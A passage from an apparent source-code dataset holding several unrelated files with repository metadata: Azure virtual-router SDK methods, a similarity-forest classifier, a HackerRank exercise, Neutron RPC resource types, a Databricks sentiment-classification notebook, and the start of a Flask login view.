def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def get(
self,
resource_group_name: str,
virtual_router_name: str,
expand: Optional[str] = None,
**kwargs
) -> "_models.VirtualRouter":
"""Gets the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouter, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.VirtualRouter
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
virtual_router_name: str,
parameters: "_models.VirtualRouter",
**kwargs
) -> "_models.VirtualRouter":
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouter')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
virtual_router_name: str,
parameters: "_models.VirtualRouter",
**kwargs
) -> AsyncLROPoller["_models.VirtualRouter"]:
"""Creates or updates the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param parameters: Parameters supplied to the create or update Virtual Router.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.VirtualRouter
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VirtualRouter or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_09_01.models.VirtualRouter]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
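    # Caller-side sketch (assumption: an authenticated async NetworkManagementClient
    # named ``client`` and a VirtualRouter model named ``router`` exist; the names are
    # illustrative only):
    #
    #     poller = await client.virtual_routers.begin_create_or_update(
    #         resource_group_name="my-rg",
    #         virtual_router_name="my-router",
    #         parameters=router,
    #     )
    #     created = await poller.result()   # waits for the long-running operation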
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.VirtualRouterListResult"]:
"""Lists all Virtual Routers in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_09_01.models.VirtualRouterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.VirtualRouterListResult"]:
"""Gets all the Virtual Routers in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_09_01.models.VirtualRouterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualRouters'} # type: ignore
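    # Consuming the pager (sketch; assumes the same illustrative ``client`` as above):
    #
    #     async for virtual_router in client.virtual_routers.list():
    #         print(virtual_router.name)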
| 49.841237
| 197
| 0.668473
|
fdfe880e3ed0270c3310e163218726b56067b4da
| 8,243
|
py
|
Python
|
simforest/_simforest.py
|
Cich0sza/SimilarityForest
|
c245ed764f419f4bada4da418c7397aca08d90a7
|
[
"MIT"
] | 1
|
2019-05-27T00:32:01.000Z
|
2019-05-27T00:32:01.000Z
|
simforest/_simforest.py
|
Cich0sza/SimilarityForest
|
c245ed764f419f4bada4da418c7397aca08d90a7
|
[
"MIT"
] | null | null | null |
simforest/_simforest.py
|
Cich0sza/SimilarityForest
|
c245ed764f419f4bada4da418c7397aca08d90a7
|
[
"MIT"
] | 1
|
2019-05-27T12:50:58.000Z
|
2019-05-27T12:50:58.000Z
|
from collections import defaultdict, Counter
import numpy as np
import pandas as pd
class AxesSampler:
def __init__(self, y, rand: np.random.RandomState = None, r=1):
self.y = self._process_y(y)
self.rand = rand if rand is not None else np.random.RandomState()
self.r = r
self.current_r = 0
def __iter__(self):
return self
def __next__(self):
return self._next()
@staticmethod
def _process_y(y):
tmp = defaultdict(list)
for i, item in enumerate(y):
tmp[item].append(i)
return tmp
def _next(self):
if self.current_r < self.r:
self.current_r += 1
tmp = list(self.y)
first_class = self.rand.choice(tmp)
tmp.remove(first_class)
second_class = self.rand.choice(tmp)
return self.rand.choice(self.y[first_class]), self.rand.choice(self.y[second_class])
else:
raise StopIteration()
class Params:
def __init__(self, gini_q=1, x_i=None, x_j=None, split_point=0, similarities=None):
self.gini_q = gini_q
self.x_i = x_i
self.x_j = x_j
self.split_point = split_point
self.similarities = similarities
class Node:
def __init__(self, depth, similarity_function=np.dot, n_axes=1,
max_depth=None, random_state=None):
self._depth = depth
self._sim_function = similarity_function
self._r = n_axes
self._max_depth = max_depth
self._random = np.random.RandomState() if random_state is None else random_state
self._left: Node = None
self._right: Node = None
self._x_i = None
self._x_j = None
self._split_point = None
self.prediction = None
@staticmethod
def _split_gini(total_left, total_right, left_val: defaultdict, right_val: Counter):
left_gini = 1 - sum(left_val[key]**2 for key in left_val) / total_left**2
right_gini = 1 - sum(right_val[key]**2 for key in right_val) / total_right**2
return (total_left * left_gini + total_right * right_gini) / (total_left + total_right)
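    # Note: each side's impurity above is the Gini index G = 1 - sum_k p_k**2
    # (computed as 1 - sum(count_k**2) / total**2); the return value is the
    # size-weighted average (n_left*G_left + n_right*G_right) / (n_left + n_right).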
def _find_split_point(self, X, y, x_i, x_j):
        # store as an ndarray so the boolean masks built from it in fit() work directly
        similarities = np.array([self._sim_function(x_k, x_j) - self._sim_function(x_k, x_i) for x_k in X])
indices = sorted((i for i in range(len(y)) if not np.isnan(similarities[i])),
key=lambda x: similarities[x])
best_params = Params()
total_val = Counter(y)
left_val = defaultdict(lambda: 0)
n = len(indices)
for i in range(n - 1):
left_val[y[indices[i]]] += 1
right_val = Counter(total_val)
right_val.subtract(left_val)
split_gini = self._split_gini(i + 1, n - i - 1, left_val, right_val)
if split_gini < best_params.gini_q:
best_params.gini_q = split_gini
best_params.x_i = x_i
best_params.x_j = x_j
# best_params.split_point = (similarities[indices[i]] + similarities[indices[i + 1]]) / 2
best_params.split_point = similarities[indices[i]]
best_params.similarities = similarities
return best_params
def fit(self, X, y):
self.prediction = list(set(y))
if len(self.prediction) == 1:
self.prediction = self.prediction[0]
return self
if self._max_depth is not None and self._depth >= self._max_depth:
return self
best_params = Params()
for i, j in AxesSampler(y, self._random, self._r):
params = self._find_split_point(X, y, X[i], X[j])
if params.gini_q < best_params.gini_q:
best_params = params
if best_params.gini_q < 1:
self._x_i = best_params.x_i
self._x_j = best_params.x_j
self._split_point = best_params.split_point
X_left = X[best_params.similarities <= self._split_point, :]
X_right = X[best_params.similarities > self._split_point, :]
y_left = y[best_params.similarities <= self._split_point]
y_right = y[best_params.similarities > self._split_point]
if len(y_left) > 0 and len(y_right) > 0:
self._left = Node(self._depth + 1,
self._sim_function,
self._r,
self._max_depth,
self._random).fit(X_left, y_left)
self._right = Node(self._depth + 1,
self._sim_function,
self._r,
self._max_depth,
self._random).fit(X_right, y_right)
return self
def predict_probability_once(self, x):
if self._left is None and self._right is None:
return self.prediction, self._depth
elif self._sim_function(x, self._x_j) - self._sim_function(x, self._x_i) <= self._split_point:
return self._left.predict_probability_once(x)
elif self._sim_function(x, self._x_j) - self._sim_function(x, self._x_i) > self._split_point:
return self._right.predict_probability_once(x)
else:
return self.prediction, self._depth
def print(self):
if self._left is not None:
self._left.print()
if self._right is not None:
self._right.print()
if self._left is None and self._right is None:
print((self._depth, self.prediction))
def predict_probability(self, X):
return [self.predict_probability_once(x) for x in X.to_numpy()]
class SimilarityForest:
def __init__(self, n_estimators=20, similarity_function=np.dot, n_axes=1,
max_depth=None, random_state=None, frac=None):
self._n_estimators = n_estimators
self._sim_function = similarity_function
self._n_axes = n_axes
self._max_depth = max_depth
self._random = random_state
assert frac is None or 0 < frac <= 1
self.frac = frac
self._trees = None
self.classes = []
def _random_sample(self, X: pd.DataFrame, y: pd.DataFrame, n=None, frac=None):
"""
A random sampler.
Returns random sample from given dataset.
:param1 X: dataset
:param2 y: labels
:return: tuple
"""
if n is not None and frac is not None:
raise ValueError("Cannot use n and frac in the same time")
if frac is None and n is None:
return X.to_numpy(), y.to_numpy().T[0]
sample_x = X.sample(n=n, frac=frac, random_state=self._random)
sample_y = y.loc[sample_x.index]
return sample_x.to_numpy(), sample_y.to_numpy().T[0]
def fit(self, X: pd.DataFrame, y: pd.DataFrame):
assert len(X) == len(y)
self.classes = sorted(set(y.to_numpy().T[0]))
self._trees = [Node(1,
self._sim_function,
self._n_axes,
self._max_depth,
self._random).fit(*self._random_sample(X, y, frac=self.frac))
for _ in range(self._n_estimators)]
def predict_probability(self, X):
probs = [tree.predict_probability(X) for tree in self._trees]
probs = np.array(probs).T
depths = []
result = []
for line in probs[0]:
line = [i if type(i) != list else np.random.choice(i) for i in line]
c = Counter(line)
for k in c:
c[k] /= len(line)
tmp = [[k, c[k]] if k in c else [k, 0] for k in self.classes]
result.append(tmp)
for line in probs[1]:
depths.append(sum(line)/len(line))
for i in range(len(result)):
result[i] = [result[i], depths[i]]
return np.array(result)
def predict(self, X):
pred_probability = self.predict_probability(X)
return [sorted(x[0], key=lambda k: k[1], reverse=True)[0][0] for x in pred_probability]
def print(self):
self._trees[0].print()
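# Illustrative usage sketch (hypothetical data; SimilarityForest.fit expects pandas
# DataFrames, with y holding a single label column):
#
#     X = pd.DataFrame({'f1': [0.0, 0.1, 0.9, 1.0], 'f2': [0.0, 0.2, 0.8, 1.0]})
#     y = pd.DataFrame({'label': [0, 0, 1, 1]})
#     forest = SimilarityForest(n_estimators=10, max_depth=3)
#     forest.fit(X, y)
#     predicted = forest.predict(X)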
| 36.312775
| 105
| 0.573214
|
cb882f33c6c43dacde11342276dc2053dc611048
| 293
|
py
|
Python
|
hackerrank/python/introduction/set_intersection_operation.py
|
mhetrerajat/ds-challenge
|
3208df5c29612b0dfe60c1c082da1f31ad220b49
|
[
"MIT"
] | null | null | null |
hackerrank/python/introduction/set_intersection_operation.py
|
mhetrerajat/ds-challenge
|
3208df5c29612b0dfe60c1c082da1f31ad220b49
|
[
"MIT"
] | 1
|
2021-05-18T07:30:16.000Z
|
2021-05-18T07:30:16.000Z
|
hackerrank/python/introduction/set_intersection_operation.py
|
mhetrerajat/ds-challenge
|
3208df5c29612b0dfe60c1c082da1f31ad220b49
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
if __name__ == "__main__":
nEnglish = int(raw_input())
englishStudents = set(map(int, raw_input().split(" ")))
nFrench = int(raw_input())
frenchStudents = set(map(int, raw_input().split(" ")))
print(len(englishStudents.intersection(frenchStudents)))
| 32.555556
| 60
| 0.668942
|
646719b747e4b10f29288a440a8bd92971dbb099
| 1,885
|
py
|
Python
|
neutron/api/rpc/callbacks/resources.py
|
cleo4zheng/neutron
|
6d65318308edfd984bdd0ff1ac7fef9486a040f7
|
[
"Apache-2.0"
] | 1
|
2019-06-02T06:15:39.000Z
|
2019-06-02T06:15:39.000Z
|
neutron/api/rpc/callbacks/resources.py
|
cleo4zheng/neutron
|
6d65318308edfd984bdd0ff1ac7fef9486a040f7
|
[
"Apache-2.0"
] | 1
|
2019-08-16T14:02:19.000Z
|
2019-08-16T14:02:19.000Z
|
neutron/api/rpc/callbacks/resources.py
|
cleo4zheng/neutron
|
6d65318308edfd984bdd0ff1ac7fef9486a040f7
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.objects import network
from neutron.objects import ports
from neutron.objects.qos import policy
from neutron.objects import securitygroup
from neutron.objects import subnet
from neutron.objects import trunk
# Supported types
TRUNK = trunk.Trunk.obj_name()
QOS_POLICY = policy.QosPolicy.obj_name()
SUBPORT = trunk.SubPort.obj_name()
PORT = ports.Port.obj_name()
NETWORK = network.Network.obj_name()
SUBNET = subnet.Subnet.obj_name()
SECURITYGROUP = securitygroup.SecurityGroup.obj_name()
SECURITYGROUPRULE = securitygroup.SecurityGroupRule.obj_name()
_VALID_CLS = (
policy.QosPolicy,
trunk.Trunk,
trunk.SubPort,
ports.Port,
subnet.Subnet,
network.Network,
securitygroup.SecurityGroup,
securitygroup.SecurityGroupRule,
)
_TYPE_TO_CLS_MAP = {cls.obj_name(): cls for cls in _VALID_CLS}
LOCAL_RESOURCE_VERSIONS = {
resource_type: cls.VERSION
for resource_type, cls in _TYPE_TO_CLS_MAP.items()
}
def get_resource_type(resource_cls):
if not resource_cls:
return None
if not hasattr(resource_cls, 'obj_name'):
return None
return resource_cls.obj_name()
def is_valid_resource_type(resource_type):
return resource_type in _TYPE_TO_CLS_MAP
def get_resource_cls(resource_type):
return _TYPE_TO_CLS_MAP.get(resource_type)
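# Illustrative use: resource type strings are the versioned-object names, so e.g.
#     is_valid_resource_type(PORT)   # -> True
#     get_resource_cls(PORT)         # -> neutron.objects.ports.Port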
| 28.134328
| 78
| 0.756499
|
2aa6d25d4dc3535d58d885316d5982f43e337ff7
| 5,560
|
py
|
Python
|
db/studentProjects/02_AkinwandeAtanda/Tweet_Analytics/045_TA03_02_binary_classification.py
|
chrislangst/scalable-data-science
|
c7beee15c7dd14d27353c4864d927c1b76cd2fa9
|
[
"Unlicense"
] | 138
|
2017-07-25T06:48:28.000Z
|
2022-03-31T12:23:36.000Z
|
db/studentProjects/02_AkinwandeAtanda/Tweet_Analytics/045_TA03_02_binary_classification.py
|
chrislangst/scalable-data-science
|
c7beee15c7dd14d27353c4864d927c1b76cd2fa9
|
[
"Unlicense"
] | 11
|
2017-08-17T13:45:54.000Z
|
2021-06-04T09:06:53.000Z
|
db/studentProjects/02_AkinwandeAtanda/Tweet_Analytics/045_TA03_02_binary_classification.py
|
chrislangst/scalable-data-science
|
c7beee15c7dd14d27353c4864d927c1b76cd2fa9
|
[
"Unlicense"
] | 74
|
2017-08-18T17:04:46.000Z
|
2022-03-21T14:30:51.000Z
|
# Databricks notebook source exported at Sun, 26 Jun 2016 01:45:30 UTC
# MAGIC %md
# MAGIC
# MAGIC # [Scalable Data Science](http://www.math.canterbury.ac.nz/~r.sainudiin/courses/ScalableDataScience/)
# MAGIC
# MAGIC
# MAGIC ### Course Project by [Akinwande Atanda](https://nz.linkedin.com/in/akinwande-atanda)
# MAGIC
# MAGIC *supported by* [](https://databricks.com/)
# MAGIC and
# MAGIC [](https://www.awseducate.com/microsite/CommunitiesEngageHome)
# COMMAND ----------
# MAGIC %md
# MAGIC The [html source url](https://raw.githubusercontent.com/raazesh-sainudiin/scalable-data-science/master/db/studentProjects/02_AkinwandeAtanda/Tweet_Analytics/045_TA03_02_binary_classification.html) of this databricks notebook and its recorded Uji :
# MAGIC
# MAGIC [](https://www.youtube.com/v/zJirlHAV6YU?rel=0&autoplay=1&modestbranding=1&start=0&end=1611)
# COMMAND ----------
# MAGIC %md
# MAGIC #Tweet Analytics
# MAGIC
# MAGIC [Presentation contents](https://github.com/aaa121/Spark-Tweet-Streaming-Presentation-May-2016).
# COMMAND ----------
# MAGIC %md
# MAGIC ## Creating Machine Learning Pipeline without Loop
# MAGIC
# MAGIC * The elasticNetParam coefficient is fixed at 1.0
# MAGIC * Read the Spark ML documentation for Logistic Regression
# MAGIC * The dataset "pos_neg_category" can be split into two or three categories as done in the next note. In this note, the dataset is randomly split into training and testing data
# MAGIC * This notebook can be upload to create a job for scheduled training and testing of the logistic classifier algorithm
# COMMAND ----------
# MAGIC %md
# MAGIC #### Import the required python libraries:
# MAGIC * From PySpark Machine Learning module import the following packages:
# MAGIC * Pipeline;
# MAGIC * binarizer, tokenizer and hash tags from feature package;
# MAGIC * logistic regression from regression package;
# MAGIC * Multi class evaluator from evaluation package
# MAGIC * Read the [PySpark ML package](http://spark.apache.org/docs/latest/ml-classification-regression.html#logistic-regression) documentation for more details
# COMMAND ----------
from pyspark.ml import *
from pyspark.ml import Pipeline
from pyspark.ml.feature import *
from pyspark.ml.classification import *
from pyspark.ml.tuning import *
from pyspark.ml.evaluation import *
from pyspark.ml.regression import *
# COMMAND ----------
# MAGIC %md
# MAGIC #### Set the Stages (Binarizer, Tokenizer, Hash Text Features, and Logistic Regression Classifier Model)
# COMMAND ----------
bin = Binarizer(inputCol = "category", outputCol = "label", threshold = 0.5) # Positive reviews > 0.5 threshold
tok = Tokenizer(inputCol = "review", outputCol = "word") #Note: The column "words" in the original table can also contain sentences that can be tokenized
hashTF = HashingTF(inputCol = tok.getOutputCol(), numFeatures = 50000, outputCol = "features")
lr = LogisticRegression(maxIter = 10, regParam = 0.0001, elasticNetParam = 1.0)
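# elasticNetParam=1.0 selects a pure L1 (lasso) penalty; 0.0 would be pure L2 (ridge)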
pipeline = Pipeline(stages = [bin, tok, hashTF, lr])
# COMMAND ----------
# MAGIC %md
# MAGIC #### Convert the imported featurized dataset to dataframe
# COMMAND ----------
df = table("pos_neg_category")
# COMMAND ----------
# MAGIC %md
# MAGIC #### Randomly split the dataframe into training and testing set
# COMMAND ----------
(trainingData, testData) = df.randomSplit([0.7, 0.3])
# COMMAND ----------
# MAGIC %md
# MAGIC #### Fit the training dataset into the pipeline
# COMMAND ----------
model = pipeline.fit(trainingData)
# COMMAND ----------
# MAGIC %md
# MAGIC #### Test the predictability of the fitted algorithm with test dataset
# COMMAND ----------
predictionModel = model.transform(testData)
# COMMAND ----------
display(predictionModel.select("label","prediction", "review", "probability")) # Prob of being 0 (negative) against 1 (positive)
# COMMAND ----------
predictionModel.select("label","prediction", "review", "probability").show(10) # Prob of being 0 (negative) against 1 (positive)
# COMMAND ----------
# MAGIC %md
# MAGIC #### Assess the accuracy of the algorithm
# COMMAND ----------
evaluator = MulticlassClassificationEvaluator(
labelCol="label", predictionCol="prediction", metricName="precision")
accuracy = evaluator.evaluate(predictionModel)
print("Logistic Regression Classifier Accuracy Rate = %g " % (accuracy))
print("Test Error = %g " % (1.0 - accuracy))
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC # [Scalable Data Science](http://www.math.canterbury.ac.nz/~r.sainudiin/courses/ScalableDataScience/)
# MAGIC
# MAGIC
# MAGIC ### Course Project by [Akinwande Atanda](https://nz.linkedin.com/in/akinwande-atanda)
# MAGIC
# MAGIC *supported by* [](https://databricks.com/)
# MAGIC and
# MAGIC [](https://www.awseducate.com/microsite/CommunitiesEngageHome)
| 39.432624
| 407
| 0.730036
|
54f399138f9970a8ae1c08a5a0505fd0fc8921f6
| 11,134
|
py
|
Python
|
acoustic/web/views/user.py
|
DavisDevasia/acoustid-server
|
b4b2acbc198b3d0497df04c2294d9f030133ede5
|
[
"MIT"
] | null | null | null |
acoustic/web/views/user.py
|
DavisDevasia/acoustid-server
|
b4b2acbc198b3d0497df04c2294d9f030133ede5
|
[
"MIT"
] | null | null | null |
acoustic/web/views/user.py
|
DavisDevasia/acoustid-server
|
b4b2acbc198b3d0497df04c2294d9f030133ede5
|
[
"MIT"
] | null | null | null |
import json
import base64
import urllib2
import logging
import random
from itsdangerous import URLSafeSerializer
from rauth import OAuth2Service
from openid import oidutil, fetchers
from openid.consumer import consumer as openid
from openid.extensions import ax, sreg
from flask import Blueprint, render_template, request, redirect, url_for, abort, current_app, session
from acoustic.web import db
from acoustic.web.utils import require_user, is_our_url
from acoustic.models import Account, AccountOpenID, AccountGoogle
from acoustic.utils import generate_api_key
from acoustic.data.account import (
lookup_account_id_by_mbuser,
lookup_account_id_by_openid,
insert_account,
get_account_details,
reset_account_apikey,
update_account_lastlogin,
is_moderator,
)
logger = logging.getLogger(__name__)
user_page = Blueprint('user', __name__)
# monkey-patch oidutil.log to use the standard logging framework
openid_logger = logging.getLogger('openid')
def log_openid_messages(message, level=0):
openid_logger.info(message)
oidutil.log = log_openid_messages
# force the use urllib2 with a timeout
fetcher = fetchers.Urllib2Fetcher()
fetcher.urlopen = lambda req: urllib2.urlopen(req, timeout=5)
fetchers.setDefaultFetcher(fetcher)
@user_page.route('/login', methods=['GET', 'POST'])
def login():
if 'id' in session:
return redirect(url_for('general.index'))
errors = list(request.args.getlist('error'))
if request.method == 'POST':
